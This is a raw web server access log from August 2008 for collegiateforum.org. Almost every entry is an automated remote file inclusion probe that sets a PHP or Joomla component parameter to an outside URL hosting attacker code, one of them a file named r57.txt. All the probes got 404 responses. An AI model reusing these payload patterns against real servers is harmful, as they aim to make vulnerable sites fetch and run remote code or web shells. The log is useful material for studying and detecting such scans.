87.106.191.136 - - [10/Aug/2008:19:29:12 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:19:30:11 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:30:20 -0700] "GET /logs/access_080616.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:30:20 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
75.125.143.162 - - [10/Aug/2008:19:30:45 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
75.125.143.162 - - [10/Aug/2008:19:30:45 -0700] "GET /logs/access_080324.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
75.125.143.162 - - [10/Aug/2008:19:30:45 -0700] "GET /logs/access_080324.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
75.125.143.162 - - [10/Aug/2008:19:30:45 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
75.125.143.162 - - [10/Aug/2008:19:30:45 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
75.125.143.162 - - [10/Aug/2008:19:30:45 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
87.22.37.144 - - [10/Aug/2008:19:30:53 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.22.37.144 - - [10/Aug/2008:19:30:53 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.22.37.144 - - [10/Aug/2008:19:30:53 -0700] "GET /logs/access_080324.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:31:02 -0700] "GET /logs/access_080204.log//modules/My_eGallery/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:31:02 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:31:05 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:31:06 -0700] "GET /logs/access_080204.log/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:31:06 -0700] "GET /logs/access_080204.log/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:31:06 -0700] "GET /errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:31:06 -0700] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:31:07 -0700] "GET /errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:31:07 -0700] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.22.37.144 - - [10/Aug/2008:19:31:26 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.22.37.144 - - [10/Aug/2008:19:31:29 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.22.37.144 - - [10/Aug/2008:19:31:29 -0700] "GET /logs/access_080324.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:31:30 -0700] "GET /logs/access_080505.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:31:39 -0700] "GET /logs/access_080324.log/config.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:31:40 -0700] "GET /config.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:31:40 -0700] "GET /logs/config.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:31:48 -0700] "GET /logs/access_080324.log/config.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:31:48 -0700] "GET /logs/access_080324.log/config.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:31:48 -0700] "GET /config.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:31:48 -0700] "GET /config.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:31:48 -0700] "GET /logs/config.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
69.73.189.205 - - [10/Aug/2008:19:31:48 -0700] "GET /logs/config.php?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.22.37.144 - - [10/Aug/2008:19:31:55 -0700] "GET /logs/access_080204.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:32:26 -0700] "GET /logs/access_080128.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:32:29 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:32:31 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
75.0.18.81 - - [10/Aug/2008:19:32:32 -0700] "GET /logs/index2.php?option=com_weblinks&task=view&Itemid=&mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.collegiateforum.org"
75.0.18.81 - - [10/Aug/2008:19:32:35 -0700] "GET /index2.php?option=com_weblinks&task=view&Itemid=&mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.collegiateforum.org"
207.44.152.61 - - [10/Aug/2008:19:32:53 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.44.152.61 - - [10/Aug/2008:19:32:53 -0700] "GET /logs/access_080324.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.44.152.61 - - [10/Aug/2008:19:32:54 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.44.152.61 - - [10/Aug/2008:19:33:21 -0700] "GET /logs/access_080204.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:33:45 -0700] "GET /logs/access_080324.log/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.191.136 - - [10/Aug/2008:19:33:51 -0700] "GET /logs/access_080204.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.22.37.144 - - [10/Aug/2008:19:34:14 -0700] "GET /logs/access_080204.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
75.125.143.162 - - [10/Aug/2008:19:34:59 -0700] "GET /logs/access_080204.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
75.125.143.162 - - [10/Aug/2008:19:35:00 -0700] "GET /logs/access_080204.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
211.230.148.85 - - [10/Aug/2008:19:35:16 -0700] "GET /logs/access_080324.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.230.148.85 - - [10/Aug/2008:19:35:16 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.230.148.85 - - [10/Aug/2008:19:35:16 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:35:23 -0700] "GET /logs/access_080324.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
87.106.191.136 - - [10/Aug/2008:19:35:43 -0700] "GET /logs/access_080324.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.191.136 - - [10/Aug/2008:19:35:43 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.191.136 - - [10/Aug/2008:19:35:44 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
219.117.239.114 - - [10/Aug/2008:19:36:16 -0700] "GET /logs/access.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:36:24 -0700] "GET /logs/access.log/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:36:24 -0700] "GET /logs/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:36:25 -0700] "GET /logs/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:36:25 -0700] "GET /logs/access_080324.log/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:36:25 -0700] "GET /admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:36:27 -0700] "GET /admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
195.5.163.212 - - [10/Aug/2008:19:36:37 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
190.54.62.68 - - [10/Aug/2008:19:36:37 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
190.54.62.68 - - [10/Aug/2008:19:36:37 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
190.54.62.68 - - [10/Aug/2008:19:36:38 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://h-pro.ru/lang/inc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:36:58 -0700] "GET /logs/access_080526.log/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:36:58 -0700] "GET /index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:36:59 -0700] "GET /logs/index.php?conteudo=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:37:11 -0700] "GET /logs/access.log/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:37:11 -0700] "GET /logs/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:37:11 -0700] "GET /admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.191.136 - - [10/Aug/2008:19:37:32 -0700] "GET /logs/access_080204.log//convert/mvcw.php?step=1&vwar_root=http://therichardsteam.com/faq/attachments/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
207.44.244.37 - - [10/Aug/2008:19:37:48 -0700] "GET /index.php?option=com_jpad&Itemid=&mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.collegiateforum.org"
207.44.244.37 - - [10/Aug/2008:19:37:48 -0700] "GET /logs/index.php?option=com_jpad&Itemid=&mosConfig_absolute_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:38:49 -0700] "GET //index.php?abg_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:40:34 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:40:34 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:19:41:20 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:19:41:21 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:43:08 -0700] "GET /logs//index.php?abg_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:43:08 -0700] "GET //index.php?abg_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:43:46 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.22.100.83 - - [10/Aug/2008:19:45:23 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
64.22.100.83 - - [10/Aug/2008:19:45:23 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
64.22.100.83 - - [10/Aug/2008:19:45:23 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:46:10 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:46:10 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
84.21.71.133 - - [10/Aug/2008:19:46:10 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://paginas.terra.com.br/lazer/fatalzinh0/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:19:46:57 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:47:56 -0700] "GET /logs/access_080331.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:47:57 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:48:00 -0700] "GET /logs/access_080331.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:48:01 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:48:01 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.106.191.136 - - [10/Aug/2008:19:48:09 -0700] "GET /logs/access_080204.log//convert/mvcw.php?step=1&vwar_root=http://www.notyouraverage.com/ultrastats/include/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:49:08 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:49:08 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:49:09 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:19:49:27 -0700] "GET /logs/access_080204.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:19:49:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
202.70.83.4 - - [10/Aug/2008:19:49:28 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:49:42 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:49:47 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "collegiateforum.org"
77.232.66.61 - - [10/Aug/2008:19:51:15 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
80.248.222.82 - - [10/Aug/2008:19:52:38 -0700] "GET /logs//include/write.php?dir=http://fotofoto.us/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.248.222.82 - - [10/Aug/2008:19:52:38 -0700] "GET //include/write.php?dir=http://fotofoto.us/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:53:18 -0700] "GET /logs/access_080204.log/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:53:19 -0700] "GET /errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.49.254.139 - - [10/Aug/2008:19:53:19 -0700] "GET /logs/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
208.80.193.26 - - [10/Aug/2008:19:53:23 -0700] "GET / HTTP/1.0" 200 918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.collegiateforum.org"
